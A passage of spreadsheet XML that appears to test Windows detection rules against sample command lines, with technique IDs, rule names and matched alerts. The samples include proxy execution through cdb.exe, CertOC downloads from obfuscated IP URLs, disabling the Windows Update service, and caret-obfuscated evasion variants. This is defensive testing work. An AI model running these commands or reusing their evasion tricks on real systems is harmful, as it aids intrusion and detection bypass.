      <c r="E4694" s="44" t="inlineStr">
        <is>
          <t>"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe" /c ".shell cmd /c echo test &gt; C:\Temp\test.txt;q" notepad.exe</t>
        </is>
      </c>
      <c r="F4694" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4694" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4694" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4694" s="44" t="n"/>
      <c r="J4694" s="44" t="n"/>
      <c r="K4694" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4695" ht="15.75" customHeight="1" s="42">
      <c r="A4695" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B4695" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cdb_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C4695" s="44" t="inlineStr">
        <is>
          <t>Potential Binary Proxy Execution Via Cdb.EXE</t>
        </is>
      </c>
      <c r="D4695" s="44" t="inlineStr">
        <is>
          <t>b5c7395f-e501-4a08-94d4-57fe7a9da9d2</t>
        </is>
      </c>
      <c r="E4695" s="44" t="inlineStr">
        <is>
          <t>"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe"	-c	".shell cmd /c echo test &gt; C:\Temp\test.txt;q"	notepad.exe</t>
        </is>
      </c>
      <c r="F4695" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4695" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4695" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4695" s="44" t="n"/>
      <c r="J4695" s="44" t="n"/>
      <c r="K4695" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4696" ht="15.75" customHeight="1" s="42">
      <c r="A4696" s="44" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B4696" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download_direct_ip</t>
        </is>
      </c>
      <c r="C4696" s="44" t="inlineStr">
        <is>
          <t>File Download From IP Based URL Via CertOC.EXE</t>
        </is>
      </c>
      <c r="D4696" s="44" t="inlineStr">
        <is>
          <t>b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a</t>
        </is>
      </c>
      <c r="E4696" s="44" t="inlineStr">
        <is>
          <t>CERTOC.EXE "-GetCACAPS" http://203.0.113.50/CertSrv/</t>
        </is>
      </c>
      <c r="F4696" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4696" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4696" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4696" s="44" t="n"/>
      <c r="J4696" s="44" t="n"/>
      <c r="K4696" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4697" ht="15.75" customHeight="1" s="42">
      <c r="A4697" s="44" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B4697" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download_direct_ip</t>
        </is>
      </c>
      <c r="C4697" s="44" t="inlineStr">
        <is>
          <t>File Download From IP Based URL Via CertOC.EXE</t>
        </is>
      </c>
      <c r="D4697" s="44" t="inlineStr">
        <is>
          <t>b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a</t>
        </is>
      </c>
      <c r="E4697" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c CERTOC.EXE -GetCA^CAPS http://203.0.113.50/CertSrv/</t>
        </is>
      </c>
      <c r="F4697" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4697" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4697" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4697" s="44" t="n"/>
      <c r="J4697" s="44" t="n"/>
      <c r="K4697" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4698" ht="15.75" customHeight="1" s="42">
      <c r="A4698" s="44" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B4698" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download_direct_ip</t>
        </is>
      </c>
      <c r="C4698" s="44" t="inlineStr">
        <is>
          <t>File Download From IP Based URL Via CertOC.EXE</t>
        </is>
      </c>
      <c r="D4698" s="44" t="inlineStr">
        <is>
          <t>b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a</t>
        </is>
      </c>
      <c r="E4698" s="44" t="inlineStr">
        <is>
          <t>CERTOC.EXE -GetCACAPS http://0xCB.0x00.0x71.0x32/CertSrv/</t>
        </is>
      </c>
      <c r="F4698" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4698" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4698" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4698" s="44" t="n"/>
      <c r="J4698" s="44" t="n"/>
      <c r="K4698" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4699" ht="15.75" customHeight="1" s="42">
      <c r="A4699" s="44" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B4699" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download_direct_ip</t>
        </is>
      </c>
      <c r="C4699" s="44" t="inlineStr">
        <is>
          <t>File Download From IP Based URL Via CertOC.EXE</t>
        </is>
      </c>
      <c r="D4699" s="44" t="inlineStr">
        <is>
          <t>b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a</t>
        </is>
      </c>
      <c r="E4699" s="44" t="inlineStr">
        <is>
          <t>CERTOC.EXE -GetCACAPS http://3405746482/CertSrv/</t>
        </is>
      </c>
      <c r="F4699" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4699" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4699" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4699" s="44" t="n"/>
      <c r="J4699" s="44" t="n"/>
      <c r="K4699" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4700" ht="15.75" customHeight="1" s="42">
      <c r="A4700" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B4700" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_shell32_susp_execution</t>
        </is>
      </c>
      <c r="C4700" s="44" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory</t>
        </is>
      </c>
      <c r="D4700" s="44" t="inlineStr">
        <is>
          <t>32b96012-7892-429e-b26c-ac2bf46066ff</t>
        </is>
      </c>
      <c r="E4700" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe "shell32".dll,Control_RunDLL C:\Users\Public\benign.cpl</t>
        </is>
      </c>
      <c r="F4700" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4700" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4700" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4700" s="44" t="inlineStr">
        <is>
          <t>Control Panel Items (0ba863e6-def5-4e50-9cea-4dd8c7dc46a4)</t>
        </is>
      </c>
      <c r="J4700" s="44" t="n"/>
      <c r="K4700" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4701" ht="15.75" customHeight="1" s="42">
      <c r="A4701" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B4701" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_shell32_susp_execution</t>
        </is>
      </c>
      <c r="C4701" s="44" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory</t>
        </is>
      </c>
      <c r="D4701" s="44" t="inlineStr">
        <is>
          <t>32b96012-7892-429e-b26c-ac2bf46066ff</t>
        </is>
      </c>
      <c r="E4701" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c rundll32.exe shell32.dll,Control_R^unDLL C:\Users\Public\benign.cpl</t>
        </is>
      </c>
      <c r="F4701" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4701" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4701" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4701" s="44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J4701" s="44" t="n"/>
      <c r="K4701" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4702" ht="15.75" customHeight="1" s="42">
      <c r="A4702" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B4702" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_shell32_susp_execution</t>
        </is>
      </c>
      <c r="C4702" s="44" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory</t>
        </is>
      </c>
      <c r="D4702" s="44" t="inlineStr">
        <is>
          <t>32b96012-7892-429e-b26c-ac2bf46066ff</t>
        </is>
      </c>
      <c r="E4702" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe shell32.dll,Control_RunDLL C:\Users\%USERNAME%\..\Public\benign.cpl</t>
        </is>
      </c>
      <c r="F4702" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4702" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4702" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4702" s="44" t="inlineStr">
        <is>
          <t>Control Panel Items (0ba863e6-def5-4e50-9cea-4dd8c7dc46a4); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9)</t>
        </is>
      </c>
      <c r="J4702" s="44" t="n"/>
      <c r="K4702" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4703" ht="15.75" customHeight="1" s="42">
      <c r="A4703" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B4703" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C4703" s="44" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D4703" s="44" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E4703" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "&amp; {Set-Service -Name wuauserv -StartupType Disabled}"</t>
        </is>
      </c>
      <c r="F4703" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4703" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4703" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4703" s="44" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service (62b20d44-1546-4e61-afce-8e175eb9473c)</t>
        </is>
      </c>
      <c r="J4703" s="44" t="n"/>
      <c r="K4703" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4704" ht="15.75" customHeight="1" s="42">
      <c r="A4704" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B4704" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C4704" s="44" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D4704" s="44" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E4704" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command Set-Service -Name wuauserv -StartupType Manual</t>
        </is>
      </c>
      <c r="F4704" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4704" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4704" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4704" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180); Service StartupType Change Via PowerShell Set-Service (62b20d44-1546-4e61-afce-8e175eb9473c)</t>
        </is>
      </c>
      <c r="J4704" s="44" t="n"/>
      <c r="K4704" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4705" ht="15.75" customHeight="1" s="42">
      <c r="A4705" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B4705" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C4705" s="44" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D4705" s="44" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E4705" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-Service -Name wuauserv -StartupType Disabled</t>
        </is>
      </c>
      <c r="F4705" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4705" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4705" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4705" s="44" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service (62b20d44-1546-4e61-afce-8e175eb9473c)</t>
        </is>
      </c>
      <c r="J4705" s="44" t="n"/>
      <c r="K4705" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4706" ht="15.75" customHeight="1" s="42">
      <c r="A4706" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B4706" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C4706" s="44" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D4706" s="44" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E4706" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "(Get-Service -Name wuauserv).StartupType = 'Disabled'; Stop-Service -Name wuauserv -Force"</t>
        </is>
      </c>
      <c r="F4706" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4706" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4706" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4706" s="44" t="inlineStr">
        <is>
          <t>Stop Windows Service Via PowerShell Stop-Service (c49c5062-0966-4170-9efd-9968c913a6cf)</t>
        </is>
      </c>
      <c r="J4706" s="44" t="n"/>
      <c r="K4706" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4707" ht="15.75" customHeight="1" s="42">
      <c r="A4707" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B4707" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_task_folder_evasion</t>
        </is>
      </c>
      <c r="C4707" s="44" t="inlineStr">
        <is>
          <t>Tasks Folder Evasion</t>
        </is>
      </c>
      <c r="D4707" s="44" t="inlineStr">
        <is>
          <t>cc4e02ba-9c06-48e2-b09e-2500cace9ae0</t>
        </is>
      </c>
      <c r="E4707" s="44" t="inlineStr">
        <is>
          <t>copy /Y C:\Temp\test.txt C:\Windows\System32\Tasks\</t>
        </is>
      </c>
      <c r="F4707" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4707" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4707" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4707" s="44" t="inlineStr">
        <is>
          <t>Tasks Folder Evasion (cc4e02ba-9c06-48e2-b09e-2500cace9ae0); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J4707" s="44" t="n"/>
      <c r="K4707" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4708" ht="15.75" customHeight="1" s="42">
      <c r="A4708" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B4708" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_task_folder_evasion</t>
        </is>
      </c>
      <c r="C4708" s="44" t="inlineStr">
        <is>
          <t>Tasks Folder Evasion</t>
        </is>
      </c>
      <c r="D4708" s="44" t="inlineStr">
        <is>
          <t>cc4e02ba-9c06-48e2-b09e-2500cace9ae0</t>
        </is>
      </c>
      <c r="E4708" s="44" t="inlineStr">
        <is>
          <t>copy C:\Temp\test.txt \Windows\System32\Tasks\test.txt</t>
        </is>
      </c>
      <c r="F4708" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4708" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4708" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4708" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J4708" s="44" t="n"/>
      <c r="K4708" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4709" ht="15.75" customHeight="1" s="42">
      <c r="A4709" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4709" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_symlinkevaluation</t>
        </is>
      </c>
      <c r="C4709" s="44" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation</t>
        </is>
      </c>
      <c r="D4709" s="44" t="inlineStr">
        <is>
          <t>c0b2768a-dd06-4671-8339-b16ca8d1f27f</t>
        </is>
      </c>
      <c r="E4709" s="44" t="inlineStr">
        <is>
          <t>fsutil behavior set "SymlinkEvaluation" R2L:1</t>
        </is>
      </c>
      <c r="F4709" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4709" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4709" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4709" s="44" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation (c0b2768a-dd06-4671-8339-b16ca8d1f27f)</t>
        </is>
      </c>
      <c r="J4709" s="44" t="n"/>
      <c r="K4709" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4710" ht="15.75" customHeight="1" s="42">
      <c r="A4710" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4710" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_symlinkevaluation</t>
        </is>
      </c>
      <c r="C4710" s="44" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation</t>
        </is>
      </c>
      <c r="D4710" s="44" t="inlineStr">
        <is>
          <t>c0b2768a-dd06-4671-8339-b16ca8d1f27f</t>
        </is>
      </c>
      <c r="E4710" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c fsutil behavior set Symlink^Evaluation R2R:1</t>
        </is>
      </c>
      <c r="F4710" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4710" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4710" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4710" s="44" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation (c0b2768a-dd06-4671-8339-b16ca8d1f27f)</t>
        </is>
      </c>
      <c r="J4710" s="44" t="n"/>
      <c r="K4710" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4711" ht="15.75" customHeight="1" s="42">
      <c r="A4711" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4711" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_symlinkevaluation</t>
        </is>
      </c>
      <c r="C4711" s="44" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation</t>
        </is>
      </c>
      <c r="D4711" s="44" t="inlineStr">
        <is>
          <t>c0b2768a-dd06-4671-8339-b16ca8d1f27f</t>
        </is>
      </c>
      <c r="E4711" s="44" t="inlineStr">
        <is>
          <t>fsutil behavior  set  SymlinkEvaluation  R2R:1</t>
        </is>
      </c>
      <c r="F4711" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4711" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4711" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4711" s="44" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation (c0b2768a-dd06-4671-8339-b16ca8d1f27f)</t>
        </is>
      </c>
      <c r="J4711" s="44" t="n"/>
      <c r="K4711" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4712" ht="15.75" customHeight="1" s="42">
      <c r="A4712" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4712" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_symlinkevaluation</t>
        </is>
      </c>
      <c r="C4712" s="44" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation</t>
        </is>
      </c>
      <c r="D4712" s="44" t="inlineStr">
        <is>
          <t>c0b2768a-dd06-4671-8339-b16ca8d1f27f</t>
        </is>
      </c>
      <c r="E4712" s="44" t="inlineStr">
        <is>
          <t>fsutil behavior set symlinkevaluation R2L:1</t>
        </is>
      </c>
      <c r="F4712" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4712" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4712" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4712" s="44" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation (c0b2768a-dd06-4671-8339-b16ca8d1f27f)</t>
        </is>
      </c>
      <c r="J4712" s="44" t="n"/>
      <c r="K4712" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4713" ht="15.75" customHeight="1" s="42">
      <c r="A4713" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4713" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sliver_c2_execution_pattern</t>
        </is>
      </c>
      <c r="C4713" s="44" t="inlineStr">
        <is>
          <t>HackTool - Sliver C2 Implant Activity Pattern</t>
        </is>
      </c>
      <c r="D4713" s="44" t="inlineStr">
        <is>
          <t>42333b2c-b425-441c-b70e-99404a17170f</t>
        </is>
      </c>
      <c r="E4713" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c powershell.exe -NoE^xit -Com^mand [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8</t>
        </is>
      </c>
      <c r="F4713" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4713" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4713" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4713" s="44" t="inlineStr">
        <is>
          <t>HackTool - Sliver C2 Implant Activity Pattern (42333b2c-b425-441c-b70e-99404a17170f)</t>
        </is>
      </c>
      <c r="J4713" s="44" t="n"/>
      <c r="K4713" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4714" ht="15.75" customHeight="1" s="42">
      <c r="A4714" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4714" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_perl_inline_command_execution</t>
        </is>
      </c>
      <c r="C4714" s="44" t="inlineStr">
        <is>
          <t>Perl Inline Command Execution</t>
        </is>
      </c>
      <c r="D4714" s="44" t="inlineStr">
        <is>
          <t>f426547a-e0f7-441a-b63e-854ac5bdf54d</t>
        </is>
      </c>
      <c r="E4714" s="44" t="inlineStr">
        <is>
          <t>C:\Strawberry\perl\bin\perl.exe -E "print 'TEST-HOST'"</t>
        </is>
      </c>
      <c r="F4714" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4714" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4714" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4714" s="44" t="inlineStr">
        <is>
          <t>Perl Inline Command Execution (f426547a-e0f7-441a-b63e-854ac5bdf54d)</t>
        </is>
      </c>
      <c r="J4714" s="44" t="n"/>
      <c r="K4714" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4715" ht="15.75" customHeight="1" s="42">
      <c r="A4715" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4715" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_perl_inline_command_execution</t>
        </is>
      </c>
      <c r="C4715" s="44" t="inlineStr">
        <is>
          <t>Perl Inline Command Execution</t>
        </is>
      </c>
      <c r="D4715" s="44" t="inlineStr">
        <is>
          <t>f426547a-e0f7-441a-b63e-854ac5bdf54d</t>
        </is>
      </c>
      <c r="E4715" s="44" t="inlineStr">
        <is>
          <t>C:\Strawberry\perl\bin\perl.exe   -e "print 'TEST-HOST'"</t>
        </is>
      </c>
      <c r="F4715" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4715" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4715" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4715" s="44" t="inlineStr">
        <is>
          <t>Perl Inline Command Execution (f426547a-e0f7-441a-b63e-854ac5bdf54d)</t>
        </is>
      </c>
      <c r="J4715" s="44" t="n"/>
      <c r="K4715" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4716" ht="15.75" customHeight="1" s="42">
      <c r="A4716" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4716" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_wsudo_susp_execution</t>
        </is>
      </c>
      <c r="C4716" s="44" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution</t>
        </is>
      </c>
      <c r="D4716" s="44" t="inlineStr">
        <is>
          <t>bdeeabc9-ff2a-4a51-be59-bb253aac7891</t>
        </is>
      </c>
      <c r="E4716" s="44" t="inlineStr">
        <is>
          <t>wsudo -u=System</t>
        </is>
      </c>
      <c r="F4716" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4716" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4716" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4716" s="44" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution (bdeeabc9-ff2a-4a51-be59-bb253aac7891); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4716" s="44" t="n"/>
      <c r="K4716" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4717" ht="15.75" customHeight="1" s="42">
      <c r="A4717" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4717" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_wsudo_susp_execution</t>
        </is>
      </c>
      <c r="C4717" s="44" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution</t>
        </is>
      </c>
      <c r="D4717" s="44" t="inlineStr">
        <is>
          <t>bdeeabc9-ff2a-4a51-be59-bb253aac7891</t>
        </is>
      </c>
      <c r="E4717" s="44" t="inlineStr">
        <is>
          <t>wsudo --user System</t>
        </is>
      </c>
      <c r="F4717" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4717" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4717" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4717" s="44" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution (bdeeabc9-ff2a-4a51-be59-bb253aac7891); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4717" s="44" t="n"/>
      <c r="K4717" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4718" ht="15.75" customHeight="1" s="42">
      <c r="A4718" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4718" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_wsudo_susp_execution</t>
        </is>
      </c>
      <c r="C4718" s="44" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution</t>
        </is>
      </c>
      <c r="D4718" s="44" t="inlineStr">
        <is>
          <t>bdeeabc9-ff2a-4a51-be59-bb253aac7891</t>
        </is>
      </c>
      <c r="E4718" s="44" t="inlineStr">
        <is>
          <t>wsudo  -u	System</t>
        </is>
      </c>
      <c r="F4718" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4718" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4718" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4718" s="44" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution (bdeeabc9-ff2a-4a51-be59-bb253aac7891); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4718" s="44" t="n"/>
      <c r="K4718" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4719" ht="15.75" customHeight="1" s="42">
      <c r="A4719" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4719" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_wsudo_susp_execution</t>
        </is>
      </c>
      <c r="C4719" s="44" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution</t>
        </is>
      </c>
      <c r="D4719" s="44" t="inlineStr">
        <is>
          <t>bdeeabc9-ff2a-4a51-be59-bb253aac7891</t>
        </is>
      </c>
      <c r="E4719" s="44" t="inlineStr">
        <is>
          <t>wsudo -u System  --</t>
        </is>
      </c>
      <c r="F4719" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4719" s="44" t="b">
        <v>0</v>
      </c>
